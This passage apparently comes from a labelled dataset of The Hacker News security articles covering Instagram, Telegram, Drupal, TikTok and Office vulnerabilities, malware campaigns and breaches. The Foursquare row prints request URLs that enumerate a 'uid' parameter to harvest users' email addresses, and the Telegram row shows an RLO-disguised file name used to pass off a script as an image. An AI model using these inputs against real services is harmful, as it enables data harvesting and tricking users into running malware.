Well, no doubt, alternatively an attacker can also dump out system memory to retrieve users' passwords in plaintext, but this is a long and complicated process compared to just running tscon.exe with a session number without leaving any trace and using any external tool.
The issue has been known to Microsoft since last six years, so it's likely the company doesn't consider it a security flaw as it requires local admin rights on the computer, and deems this is how its operating system is supposed to behave.
",Vulnerability
Shocking! Instagram HACKED! Researcher hacked into Instagram Server and Admin Panel,https://thehackernews.com/2015/12/how-to-hack-instagram.html,"Ever wonder how to hack Instagram or how to hack a facebook account? Well, someone just did it!
But, remember, even responsibly reporting a security vulnerability could end up in taking legal actions against you.
An independent security researcher claims he was threatened by Facebook after he responsibly revealed a series of security vulnerabilities and configuration flaws that allowed him to successfully gained access to sensitive data stored on Instagram servers, including:
Source Code of Instagram website
SSL Certificates and Private Keys for Instagram
Keys used to sign authentication cookies
Personal details of Instagram Users and Employees
Email server credentials
Keys for over a half-dozen critical other functions
However, instead of paying him a reward, Facebook has threatened to sue the researcher of intentionally withholding flaws and information from its team.
Wesley Weinberg, a senior security researcher at Synack, participated in Facebook's bug bounty program and started analyzing Instagram systems after one of his friends hinted him to a potentially vulnerable server located at sensu.instagram.com
The researcher found an RCE (Remote Code Execution) bug in the way it processed users' session cookies that are generally used to remember users' log-in details.
Remote code execution bug was possible due to two weaknesses:
The Sensu-Admin web app running on the server contained a hard-coded Ruby secret token
The host running a version of Ruby (3.x) that was susceptible to code execution via the Ruby session cookie
Exploiting the vulnerability, Weinberg was able to force the server to vomit up a database containing login details, including credentials, of Instagram and Facebook employees.
Although the passwords were encrypted with 'bcrypt', Weinberg was able to crack a dozen of passwords that had been very weak (like changeme, instagram, password) in just a few minutes.
Exposed EVERYTHING including Your Selfies
Weinberg did not stop here. He took a close look at other configuration files he found on the server and discovered that one of the files contained some keys for Amazon Web Services accounts, the cloud computing service used to host Instagram's Sensu setup.
These keys listed 82 Amazon S3 buckets (storage units), but these buckets were unique. He found nothing sensitive in the latest file in that bucket, but when he looked at the older version of the file, he found another key pair that let him read the contents of all 82 buckets.
Weinberg had inadvertently stumbled upon almost EVERYTHING including:
Instagram's source code
SSL certificates and private keys (including for instagram.com and *.instagram.com)
API keys that are used for interacting with other services
Images uploaded by Instagram users
Static content from the instagram.com website
Email server credentials
iOS/Android app signing keys
Other sensitive data
""To say that I had gained access to basically all of Instagram's secret key material would probably be a fair statement,"" Weinberg wrote in his blog. ""With the keys I obtained, I could now easily impersonate Instagram, or any valid user or staff member. While out of scope, I would have easily been able to gain full access to any user's account, [personal] pictures and data.""
Responsible Disclosure, but Facebook Threatens Lawsuit
Weinberg reported his findings to Facebook's security team, but the social media giant was concerned he had accessed private data of its users and employees while uncovering the issues.
Instead of receiving a reward from Facebook for his hard work, Weinberg was unqualified for the bug bounty program by Facebook.
In early December, Weinberg claims his boss Synack CEO, Jay Kaplan, received a scary call from Facebook security chief Alex Stamos regarding the weaknesses Weinberg discovered in Instagram that left Instagram and Facebook users wide open to a devastating attack.
Stamos ""stated that he did not want to have to get Facebook's legal team involved, but that he was not sure if this was something he needed to go to law enforcement over,"" Weinberg wrote in his blog in a section entitled 'Threats and Intimidation.'
In response, Stamos issued a statement, saying he ""did not threaten legal action against Synack or [Weinberg] nor did [he] ask for [Weinberg] to be fired.""
Stamos said he only told Kaplan to ""keep this out of the hands of the lawyers on both sides.""
""Condoning researchers going well above and beyond what is necessary to find and fix critical issues would create a precedent that could be used by those aiming to violate the privacy of our users, and such behavior by legitimate security researchers puts the future of paid bug bounties at risk,"" Stamos added.
Facebook Responds
After the original publication by the researcher, Facebook issued its response, saying the claims are false and that Weinberg was never told not to publish his findings, rather only asked not to disclose the non-public information he accessed.
The social media giant confirmed the existence of the remote code execution bug in the sensu.instagram.com domain and promised a bug bounty of $2,500 as a reward to Weinberg and his friend who initially hinted that the server was openly accessible.
However, the other vulnerabilities that allowed Weinberg to gain access to sensitive data were not qualified, with Facebook saying he violated user privacy while accessing the data.
Here's the full statement by Facebook:
We are strong advocates of the security researcher community and have built positive relationships with thousands of people through our bug bounty program. These interactions must include trust, however, and that includes reporting the details of bugs that are found and not using them to access private information in an unauthorized manner. In this case, the researcher intentionally withheld bugs and information from our team and went far beyond the guidelines of our program to pull private, non-user data from internal systems.
We paid him for his initial bug report based on the quality, even though he was not the first to report it, but we didn't pay for the subsequent information that he had withheld. At no point did we say he could not publish his findings — we asked that he refrain from disclosing the non-public information he accessed in violation of our program guidelines. We remain firmly committed to paying for high quality research and helping the community learn from researchers' hard work.
",Vulnerability
Google Chrome blocks access to Twitpic for Malware risk,https://thehackernews.com/2012/12/google-chrome-blocks-access-to-twitpic.html,"Suddenly today Google Chrome start detecting Twitpic.com as malware threat. Twitpic is one of the most popular website for Sharing photos and videos on Twitter. Twitpic denies and said that there is no malware on the website and is trying to contact Google.
We also notice that, Twitter profiles and pages with Twitpic URL in tweets are also blocked curretly by Chrome. Many people also complaining about this on Google Help forum.
An official statement from Twitpic via tweet,""Working to fix the google chrome malware notice when visiting Twitpic.com as this is not true or the case, trying to contact google"".
Google's Safe Browsing Diagnostic page for twitpic.com saying, ""Site is listed as suspicious - visiting this web site may harm your computer. Of the 12029 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-12-30, and suspicious content was never found on this site within the past 90 days.""
Also Google report said,""No, this site has not hosted malicious software over the past 90 days. In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.""
There are no further information yet available, we will update you soon !
",Malware
Watch Out for Malware If You're Interested in North Korean Missile Program,https://thehackernews.com/2017/07/north-korea-missile-malware.html,"If you hold an interest in the North Korean Missile Program and are one of those curious to know capabilities of the recently tested North Korean long-range missile than you could be a target of a new malware campaign.
North Korea claims to have conducted the first test of an intercontinental ballistic missile (ICBM), the Hwasong-14, on 3rd July, and US officials believe the country may have fired a brand-new missile that has not been seen before.
Now, just a day after the test missile launch, hackers have started utilizing the news to target people interested in North Korean missile arsenal that has progressed over the decades from crude artillery rockets to testing what the country claims long-range missiles that could strike targets in the United States.
Security researchers at Talos Intelligence have discovered a new malware campaign that started on 4th July to target victims with KONNI, an unknown Remote Access Trojan (RAT) that has been in use for over three years.
The KONNI malware is a Remote Access Trojan designed to steal files, record keystrokes, perform screenshots, get the system information, including hostname, IP address, username, OS version and installed software, as well as execute malicious code on the infected computer.
How Does the KONNI Malware Work?
The hackers use an email attachment as the initial infection vector to deliver the Trojan through an executable file, which when opened displays an MS Office document that disguised as an article about the test missile launch.
However, the content of the document is copy/pasted from an article published on July 3rd by South Korean Yonhap News Agency.
In reality, the malicious executable drops two different versions of KONNI: event.dll and errorevent.dll.
On 64-bit versions of Windows, both binaries are dropped, while just errorevent.dll is dropped on 32-bit versions of Windows.
The dropped malware is then immediately executed to ""ensure that the malware persists and is executed on rebooting the compromised system,"" the researchers say.
C&C Server Disguises as a Legitimate Climbing Club Website
The malware uses a new Command and Control server hosted on a website that disguises as a legitimate climbing club, but the site does not actually contain any real text, but the default text of the CMS (Content Management System).
The C&C traffic of the malware also takes place as ""HTTP post requests to web pages hosted as /weget/download.php, /weget/uploadtm.php or /weget/upload.php on the domain itself.""
In addition, the website also contains a contact section with an address in USA, but the map below the address points to a location in Seoul, South Korea.
""The threat actors associated with KONNI typically use decoy documents relating to North Korea, and this campaign is no exception. However, in contrast to the convincing decoy document lifted from a third party, the content of the decoy website hosted on the CnC server does not look legitimate,"" the researchers concluded.
""Nevertheless, this threat actor continues to remain active and continues to develop updated versions of their malware. Organizations which may have an interest in the contents of this decoy document and that used in previous campaigns should ensure that they are adequately protected against this and subsequent campaigns.""
So, my advice for users to remain protected from such malware is always be suspicious of uninvited documents sent over an email and never click on links inside those documents unless verifying the source.
Additionally, keep your systems and antivirus updated to protect against any latest threat.
",Malware
Widespread Instagram Hack Locking Users Out of Their Accounts,https://thehackernews.com/2018/08/hack-instagram-accounts.html,"Instagram has been hit by a widespread hacking campaign that appears to stem from Russia and have affected hundreds of users over the past week, leaving them locked out of their accounts.
A growing number of Instagram users are taking to social media, including Twitter and Reddit, to report a mysterious hack which involves locking them out of their account with their email addresses changed to .ru domains.
According to victims, their account names, profile pictures, passwords, email addresses associated with their Instagram accounts, and even connected Facebook accounts are being changed in the attack.
Many of the affected Instagram users are also complaining about their profile photos replaced with stills from popular films, including Despicable Me 3 and Pirates of the Caribbean.
Although it is still unknown who is behind the widespread hack of Instagram accounts, the use of the email addresses originating from Russian email provider mail.ru may indicate a Russian hacker or hacking group is behind the attack, or perhaps hackers pretending to be from Russia.
First spotted by Mashable, the hack even affected Instagram users with two-factor authentication (2FA) enabled, as at least one user told Mashable that he was using 2FA, but it did nothing to stop his account from being hacked. However, it is currently unconfirmed.
In response to the report, Instagram published a blog post saying that the company continues to investigate the issue and that it has ""dedicated teams helping people to secure their accounts.""
""We are aware that some people are having difficulty accessing their Instagram accounts,"" Instagram says, pointing users to its guidance on hacked accounts to help keep their account secure.
The company advises Instagram users to keep a secure password with at least six numbers and/or letters, enable 2FA for additional security, and to revoke any suspicious third-party app that might have access to their accounts.
Instagram currently relies on text messages for two-factor authentication, which is believed to be less secure than other app-based 2FA methods, but the Facebook-owned company says it is working on improving its 2FA settings.
However, since the unknown technique being used by attackers to hack Instagram accounts is still unaddressed, there's nothing much you can do if the suspected loophole can also bypass two-factor authentication.
The motive behind the attacks is still unknown, but it appears that the attacks on Instagram are still happening at the time of writing.
For more information, users are recommended to visit the Instagram Help Centre dedicated to hacked accounts, which includes security tips as well as steps they can take to restore their account.
",Cyber_Attack
Facebook Collected Your Android Call History and SMS Data For Years,https://thehackernews.com/2018/03/facebook-android-data.html,"Facebook knows a lot about you, your likes and dislikes—it's no surprise.
But do you know, if you have installed Facebook Messenger app on your Android device, there are chances that the company had been collecting your contacts, SMS, and call history data at least until late last year.
A tweet from Dylan McKay, a New Zealand-based programmer, which received more than 38,000 retweets (at the time of writing), showed how he found his year-old data—including complete logs of incoming and outgoing calls and SMS messages—in an archive he downloaded (as a ZIP file) from Facebook.
Facebook was collecting this data on its users from last few years, which was even reported earlier in media, but the story did not get much attention at that time.
Since Facebook had been embroiled into controversies over its data sharing practices after the Cambridge Analytica scandal last week, tweets from McKay went viral and has now fueled the never-ending privacy debate.
A Facebook spokesperson explained, since almost all social networking sites have been designed to make it easier for users to connect with their friends and family members, Facebook also uploads its users' contacts to offer same.
As Ars reported, in older versions of Android when permissions were a lot less strict, the Facebook app took away contact permission at the time of installation that allowed the company access to call and message data automatically.
Eventually, Google changed the way Android permissions worked in version 16 of its API, making them more clear and granular by informing users whenever any app tries to execute permissions.
However, developers were able to bypass this change, and Facebook continued accessing call and SMS data until Google deprecated version 4.0 of the Android API in October last year.
Even you can check what data the social network has collected on you so far by going to your Facebook's Settings→Download a copy of your Facebook data→Start My Archive.
If you don't want Facebook to store or continuously upload your contacts to its server, you can turn off the continuous uploading setting in the Messenger app. This change will also delete all your previously uploaded contacts.
Facebook users on Apple devices are on the safer side, as iOS has never allowed silent access to call data.
",Data_Breaches
"Mexican Govt. Allegedly Used Spyware Against Journalists, Activists & A Child",https://thehackernews.com/2017/06/mexican-spyware-malware.html,"After the disclosure of sophisticated global espionage and disinformation campaign aimed to discredit enemies of the state, Citizen Lab researchers exposed the dirty game of the Mexican government and its politics.
The report — ""Government Spy: Systematic monitoring of journalists and human rights defenders in Mexico"" — published by Citizen Lab today revealed how the Mexican government used advanced spyware tools purchased from the NSO Group to target the country's most prominent human rights lawyers, anti-corruption activists, and journalists.
The NSO Group, an Israel-based company that produces the most advanced mobile spyware on the planet, sold the tool to governments with an explicit agreement that it should be used only to fight terrorists or criminal groups that have long kidnapped and killed Mexicans.
But, the Mexican government targets include:
Lawyers looking into the case of 43 Students disappeared in September 2014 from the town of Iguala.
Two Mexican most influential journalists.
An American who is representing victims of sexual abuse by the police.
A child, presumably in an attempt to spy on his mother.
""The targets share a basic connection: they have been involved in investigating or working on reports of high-level official corruption, or government involvement in human rights abuses,"" the report says.
According to the report, the purchase of the NSO Group's exploit ""has been documented by at least three units in Mexico:
the National Defense Secretariat (SEDENA)
the Attorney General's Office (PGR)
the National Security and Investigation Center (CISEN)
Since 2011, the above three Mexican federal agencies have purchased nearly $80 Million worth of spyware from the NSO group.
The surveillance tool in question is the infamous mobile spyware 'Pegasus' that was also used in targeted cyber attacks against human rights activists in the United Arab Emirates last year.
Pegasus is one of the NSO group's most advanced mobile spyware tool that can infiltrate Android, as well as iPhones to monitor calls, texts, email, contacts, and calendars, as well as use the phone's microphone and camera for surveillance, turning a target's smartphone into a sophisticated bugging device.
According to the report, the targets had received over 76 messages with links to the Pegasus exploit along with uniquely crafted social engineering messages, ""troubling personal and sexual taunts, messages impersonating official communications by the Embassy of the United States in Mexico, fake AMBER Alerts, warnings of kidnappings, and other threats.""
Once the victims open the link, Pegasus would then get downloaded onto their smartphones, turning the target's smartphone into a digital spying tool, which is in the pocket of victims, but fully under the control of the operator.
The malware allows the attacker to extract an incredible amount of data stored in files, contacts, messages, and emails and then forward them to a hidden server. It also takes control of the smartphone's microphone and camera — all without users' knowledge.
Among those targeted by the government include:
Activists with the Centro Miguel Agustín Pro Juárez for Human Rights (Centro PRODH)
Members of the Mexican Institute for Competitiveness (IMCO)
TV personality and investigative journalist Carmen Aristegui, along with her son Emilio Aristegui (a teenager)
Other journalists working for the Mexican non-profit Against Corruption and Impunity
TV network Televisa anchor Carlos Loret de Mola
A majority of the infection attempts on victims were recorded under two separate events: in August 2015 and between April 2016 and July 2016.
The report asserts that all evidence points towards the Mexican government which itself is behind the cyber espionage.
",Malware
"""4chan Hacked"", Most Popular Image-Bulletin Board Compromised",https://thehackernews.com/2014/04/4chan-Hacked-Image-Bulletin-Board.html,"The founder of 4chan, Christopher Poole, aka ""moot"" has confirmed few hours ago, in a blog post that the popular image-based bulletin board was hacked.
The attacker gained access to the administrative functions and successfully hacked into one of 4chan's database by exploiting a website's software vulnerability last week. The motive behind the hack was to expose the posting habits of a specific user the attacker didn't like, moot wrote.
It is believed that the software vulnerability allowed the attacker to hack into only the image-board moderation panels, and some tables in the 4chan back-end database. According to the blog post, the way hacker extracted the information from its database, 4chan knows the ""detailed logs of what was accessed"", which indicate that the ""primarily moderator account names"" and their ""credentials"" were targeted and compromised by the hacker.
""Due to the way the intruder extracted information from the database, we have detailed logs of what was accessed. The logs indicate that primarily moderator account names and credentials were targeted,"" reads the blog post.
The hacker was able to access the Pass credentials of three 4chan Pass (paid account without CAPTCHAs system) users, who have been notified by the company shortly after the discovery of the attack and offered refunds along with the lifetime Passes.
The founder of the 4chan assured its users that their financial information has not been compromised in the attack as 4chan doesn't process any payment information and all the payment information is ""processed securely"" by the Stripe.
After 4chan aware of this software vulnerability exploited by the hacker, it was patched quickly and 4chan assured its users that they continue to review its software and systems to prevent future attacks and breaches.
A week ago, Moderators of Social-sharing website Reddit were under attack after being accused of censoring posted links containing words like ""National Security Agency,"" ""Edward Snowden"" and even ""Bitcoin"" on the website's subreddit r/technology.
The Reddit moderators have lost their focus of what they were there to do. Their job is to moderate effectively, but this secret censorship is a ""disaster"" as it lost the transparency between the user and the service.
4chan apologized for the inconvenience caused to its users, but this is not first time hacker targeted 4chan. Back in June 2012, the hacker UGNazi changed the DNS for 4chan and redirected its visitors to UGNazis Twitter account.
",Data_Breaches
Foursquare vulnerability that exposes 45 million users' email addresses,https://thehackernews.com/2014/01/foursquare-vulnerability-that-exposes.html,"A location based Social Networking platform with 45 million users,'Foursquare' was vulnerable to the primary email address disclosed.
Foursquare is a Smartphone application that gives you details of nearby cafes, bars, shops, parks using GPS location and also tells about your friends nearby.
According to a Penetration tester and hacker 'Jamal Eddine', an attacker can extract email addresses of all 45 million users just by using a few lines of scripting tool.
Basically the flaw exists in the Invitation system of the Foursquare app. While testing the app, he found that invitation received on the recipient's end actually disclosing the sender's email address, as shown above.
Invitation URL:
https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=64761059&sig=mmlx96RwGrQ2fJAg4OWZhAWnDvc%3D
Where 'uid' parameter represents the sender's profile ID.
Hacker noticed that the parameter in the Invitation URL can be modified in order to spoof the sender profile i.e. Just by modifying the value of 'uid' parameter, one can see the email ID of the respective user.
If someone is a good programmer, then dumping the complete database won't be a difficult task.
https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=35
https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=60
https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=65
https://foursquare.com/mehdi?action=acceptFriendship&expires=1378920415&src=wtbfe&uid=4444
And so forth...
The same question still persist that what can be done if someone knows my name and my email id? Many of us use same mail account on all of the social networking sites i.e. Primary email address, and if your personal email address gets leaked from any of the website, someone can start sending you spam, malware or phishing attempts.
I think you don't want to be phished by any hacking group like Syrian Electronic hacker or this information can easily aid other cyber attacks.
In July, 2013, Similar vulnerability was reported on Facebook, discloses the primary email address of any Facebook user to hackers and spammers.
As a responsible bug hunter, he reported the flaw to Foursquare's Security Team, and they have finally fixed the issue.
",Vulnerability
Hackers Exploit 'Telegram Messenger' Zero-Day Flaw to Spread Malware,https://thehackernews.com/2018/02/hackers-exploit-telegram-messenger-zero.html,"A zero-day vulnerability has been discovered in the desktop version for end-to-end encrypted Telegram messaging app that was being exploited in the wild in order to spread malware that mines cryptocurrencies such as Monero and ZCash.
The Telegram vulnerability was uncovered by security researcher Alexey Firsh from Kaspersky Lab last October and affects only the Windows client of Telegram messaging software.
The flaw has actively been exploited in the wild since at least March 2017 by attackers who tricked victims into downloading malicious software onto their PCs that used their CPU power to mine cryptocurrencies or serve as a backdoor for attackers to remotely control the affected machine, according to a blogpost on Securelist.
Here's How Telegram Vulnerability Works
The vulnerability resides in the way Telegram Windows client handles the RLO (right-to-left override) Unicode character (U+202E), which is used for coding languages that are written from right to left, like Arabic or Hebrew.
According to Kaspersky Lab, the malware creators used a hidden RLO Unicode character in the file name that reversed the order of the characters, thus renaming the file itself, and send it to Telegram users.
For example, when an attacker sends a file named ""photo_high_re*U+202E*gnp.js"" in a message to a Telegram user, the file's name rendered on the users' screen flipping the last part.
Therefore, the Telegram user will see an incoming PNG image file (as shown in the below image) instead of a JavaScript file, misleading into downloading malicious files disguised as the image.
""As a result, users downloaded hidden malware which was then installed on their computers,"" Kaspersky says in its press release published today.
Kaspersky Lab reported the vulnerability to Telegram and the company has since patched the vulnerability in its products, as the Russian security firm said: ""at the time of publication, the zero-day flaw has not since been observed in messenger's products.""
Hackers Used Telegram to Infect PCs with Cryptocurrency Miners
During the analysis, Kaspersky researchers found several scenarios of zero-day exploitation in the wild by threat actors. Primarily, the flaw was actively exploited to deliver cryptocurrency mining malware, which uses the victim's PC computing power to mine different types of cryptocurrency including Monero, Zcash, Fantomcoin, and others.
While analyzing the servers of malicious actors, the researchers also found archives containing a Telegram's local cache that had been stolen from victims.
In another case, cybercriminals successfully exploited the vulnerability to install a backdoor trojan that used the Telegram API as a command and control protocol, allowing hackers to gain remote access to the victim's computer.
""After installation, it started to operate in a silent mode, which allowed the threat actor to remain unnoticed in the network and execute different commands including the further installation of spyware tools,"" the firm added.
Firsh believes the zero-day vulnerability was exploited only by Russian cybercriminals, as ""all the exploitation cases that [the researchers] detected occurring in Russia,"" and a lot of artifacts pointed towards Russian cybercriminals.
The best way to protect yourself from such attacks is not to download or open files from unknown or untrusted sources.
The security firm also recommended users to avoid sharing any sensitive personal information in messaging apps and make sure to have a good antivirus software from reliable company installed on your systems.
",Malware
Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners,https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html,"The Drupal vulnerability (CVE-2018-7600), dubbed Drupalgeddon2 that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners.
Drupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details.
However, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) exploit code was made widely available, and large-scale Internet scanning and exploitation attempts followed.
At the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites.
The SANS Internet Storm Center spotted some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl.
The simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server.
A thread on SANS ISC Infosec forums also suggests that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system.
Researchers from security firm Volexity have also observed a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites.
The researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017.
Volexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567.
As we reported in our previous article, Imperva stats showed that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets.
For those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8.
Therefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible.
In its advisory, Drupal warned that ""sites not patched by Wednesday, 2018-04-11 may be compromised"" and ""simply updating Drupal will not remove backdoors or fix compromised sites.""
Moreover,
""If you find that your site is already patched, but you didn't do it, that can be a symptom that the site was compromised. Some attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site.""
Here's a guide Drupal team suggest to follow if your website has been hacked.
",Cyber_Attack
TikTok Bug Could Have Exposed Users' Profile Data and Phone Numbers,https://thehackernews.com/2021/01/tiktok-bug-could-have-exposed-users.html,"Cybersecurity researchers on Tuesday disclosed a now-patched security flaw in TikTok that could have potentially enabled an attacker to build a database of the app's users and their associated phone numbers for future malicious activity.
Although this flaw only impacts those users who have linked a phone number with their account or logged in with a phone number, a successful exploitation of the vulnerability could have resulted in data leakage and privacy violation, Check Point Research said in an analysis shared with The Hacker News.
TikTok has deployed a fix to address the shortcoming following responsible disclosure from Check Point researchers.
The newly discovered bug resides in TikTok's ""Find friends"" feature that allows users to sync their contacts with the service to identify potential people to follow.
The contacts are uploaded to TikTok via an HTTP request in the form of a list that consists of hashed contact names and the corresponding phone numbers.
The app, in the next step, sends out a second HTTP request that retrieves the TikTok profiles connected to the phone numbers sent in the previous request. This response includes profile names, phone numbers, photos, and other profile related information.
While the upload and sync contact requests are limited to 500 contacts per day, per user, and per device, Check Point researchers found a way to get around the limitation by getting hold of the device identifier, session cookies set by the server, a unique token called ""X-Tt-Token"" that's set when logging into the account with SMS and simulate the whole process from an emulator running Android 6.0.1.
It's worth noting that in order to request data from the TikTok application server, the HTTP requests must include X-Gorgon and X-Khronos headers for server verification, which ensures that the messages are not tampered with.
But by modifying the HTTP requests — the number of contacts the attacker wants to sync — and re-signing them with an updated message signature, the flaw made it possible to automate the procedure of uploading and syncing contacts on a large scale and create a database of linked accounts and their connected phone numbers.
This is far from the first time the popular video-sharing app has been found to contain security weaknesses.
In January 2020, Check Point researchers discovered multiple vulnerabilities within the TikTok app that could have been exploited to get hold of user accounts and manipulate their content, including deleting videos, uploading unauthorized videos, making private ""hidden"" videos public, and revealing personal information saved on the account.
Then in April, security researchers Talal Haj Bakry and Tommy Mysk exposed flaws in TikTok that made it possible for attackers to display forged videos, including those from verified accounts, by redirecting the app to a fake server hosting a collection of fake videos.
Eventually, TikTok launched a bug bounty partnership with HackerOne last October to help users or security professionals flag technical concerns with the platform. Critical vulnerabilities (CVSS score 9 - 10) are eligible for payouts between $6,900 to $14,800, according to the program.
""Our primary motivation, this time around, was to explore the privacy of TikTok,"" said Oded Vanunu, head of products vulnerabilities research at Check Point. ""We were curious if the TikTok platform could be used to gain private user data. It turns out that the answer was yes, as we were able to bypass multiple protection mechanisms of TikTok that lead to privacy violation.""
""An attacker with that degree of sensitive information could perform a range of malicious activities, such as spear phishing or other criminal actions.""
",Cyber_Attack
Hackers Exploit Recently Disclosed Microsoft Office Bug to Backdoor PCs,https://thehackernews.com/2017/11/cobalt-strike-malware.html,"A recently disclosed severe 17-year-old vulnerability in Microsoft Office that lets hackers install malware on targeted computers without user interaction is now being exploited in the wild to distribute a backdoor malware.
First spotted by researchers at security firm Fortinet, the malware has been dubbed Cobalt because it uses a component from a powerful and legitimate penetration testing tool, called Cobalt Strike.
Cobalt Strike is a form of software developed for Red Team Operations and Adversary Simulations for accessing covert channels of a system.
The vulnerability (CVE-2017-11882) that Cobalt malware utilizes to deliver the backdoor is a memory-corruption issue that allows unauthenticated, remote attackers to execute malicious code on the targeted system when opened a malicious file and potentially take full control over it.
This vulnerability impacts all versions of Microsoft Office and Windows operating system, though Microsoft has already released a patch update to address the issue. You can read more details and impact of the vulnerability in our previous article.
Since cybercriminals are quite quick in taking advantage of newly disclosed vulnerabilities, the threat actors started delivering Cobalt malware using the CVE-2017-11882 exploit via spam just a few days after its disclosure.
According to Fortinet researchers, the Cobalt malware is delivered through spam emails, which disguised as a notification from Visa regarding rule changes in Russia, with an attachment that includes a malicious RTF document, as shown.
The email also contains a password-protected archive with login credentials provided in the email to unlock it in order to trick victims into believing that the email came from the legitimate financial service.
""This is [also] to prevent auto-analysis systems from extracting the malicious files for sandboxing and detection,"" Fortinet researchers Jasper Manual and Joie Salvio wrote.
""Since a copy of the malicious document is out in the open... so it's possible that this is only to trick the user into thinking that securities are in place, which is something one would expect in an email from a widely used financial service.""
Once the document is opened, the user has displayed a plain document with the words ""Enable Editing."" However, a PowerShell script silently executes in the background, which eventually downloads a Cobalt Strike client to take control of the victim's machine.
With control of the victim's system, hackers can ""initiate lateral movement procedures in the network by executing a wide array of commands,"" the researchers said.
According to the researchers, cybercriminals are always in look for such vulnerabilities to exploit them for their malware campaigns, and due to ignoring software updates, a significant number of users out there left their systems unpatched, making them vulnerable to such attacks.
The best way to protect your computer against the Cobalt malware attack is to download the patch for the CVE-2017-11882 vulnerability and update your systems immediately.
",Cyber_Attack
iOS 13 Bug Lets 3rd-Party Keyboards Gain 'Full Access' — Even When You Deny,https://thehackernews.com/2019/09/ios-13-keyboard-apps.html,"Following the release of iOS 13 and iPadOS earlier this week, Apple has issued an advisory warning iPhone and iPad users of an unpatched security bug impacting third-party keyboard apps.
On iOS, third-party keyboard extensions can run entirely standalone without access to external services and thus, are forbidden from storing what you type unless you grant ""full access"" permissions to enable some additional features through network access.
However, in the brief security advisory, Apple says that an unpatched issue in iOS 13 and iPadOS could allow third-party keyboard apps to grant themselves ""full access"" permission to access what you are typing—even if you deny this permission request in the first place.
It should be noted that the iOS 13 bug doesn't affect Apple's built-in keyboards or third-party keyboards that don't make use of full access.
Instead, the bug only impacts users who have third-party keyboard apps—such as popular Gboard, Grammarly, and Swiftkey—installed on their iPhones or iPads, which are designed to request full access from users.
Though having full access allows app developers to capture all keystroke data and everything you type, it's worth noting that likely no reputable third-party keyboard apps would by default abuse this issue.
Even if that doesn't satisfy you, and you want to check if any of the installed third-party keyboards on your iPhone or iPad has enabled full access without your knowledge by exploiting this bug, you can open the Settings → General → Keyboard → Keyboards.
Apple assured its users that the company is already working on a fix to address this issue, which it plans to release in its upcoming software update.
Until Apple comes up with a fix, you can mitigate this issue by temporarily uninstalling all third-party keyboards from your device just to be on the safer side.
",Vulnerability
LIVE Webinar: Major Lessons to be Learned from Top Cyber Attacks in 2020,https://thehackernews.com/2021/02/live-webinar-major-lessons-to-be.html,"We likely all agree that 2020 was a year we won't soon forget - for many reasons. One area particularly impacted last year was (and continues to be) cybersecurity.
While Internet access allowed many businesses to continue functioning during the COVID-19 stay at home requirements, the unprecedented number of people accessing company assets remotely introduced many new challenges for cybersecurity professionals.
With a history of leveraging societal maladies to their advantage, cyber criminals leverage the confusion and unpreparedness created by the global pandemic in their cyber attacks.
In just the last two months of 2020, several high-profile organizations and government entities were successfully attacked using clever approaches that were overlooked by cybersecurity experts. Making sense of how attacks have changed and what new defensive strategies should be taken is no easy task. Cybersecurity company Cynet will help by reviewing the 2020 high profile attacks in depth and guide cybersecurity professionals for 2021 in an upcoming webinar (register here).
Until then, what high profile attacks are they likely to explore?
The Top 2020 Cyber Attacks
Without enough space to cover all the top attacks in 2020, several significant breaches were predominantly accomplished by new techniques.
SolarWinds
The attack involved hackers compromising the infrastructure of SolarWinds, a company that produces a network and application monitoring platform called Orion. The attackers then used that access to produce and distribute trojanized updates to the software's users, including 425 of the US Fortune 500, the top ten US telecommunications companies, the top five US accounting firms, all branches of the US Military, the Pentagon, and the State Department, as well as hundreds of universities and colleges worldwide.
Cybersecurity company FireEye was successfully breached using a malware-infected update to SolarWinds Orion.
An additional malware, dubbed Supernova, also used the SolarWinds Orion product as its delivery method but was likely developed and used by a different threat actor.
Software AG
The second-largest software vendor in Germany and the seventh-largest in Europe, Software AG was reportedly hit by a Clop ransomware attack in October 2020. It was reported that the cyber-criminal gang had demanded a $23 million ransom.
Sopra Steria
Sopra Steria is a European information technology firm with 46,000 employees in 25 countries, providing a large array of IT services, including consulting, systems integration, and software development. In October 2020, Sopra Steria was attacked by what turned out to be a new version of the Ryuk ransomware, previously unknown to antivirus software providers and security agencies.
Telegram
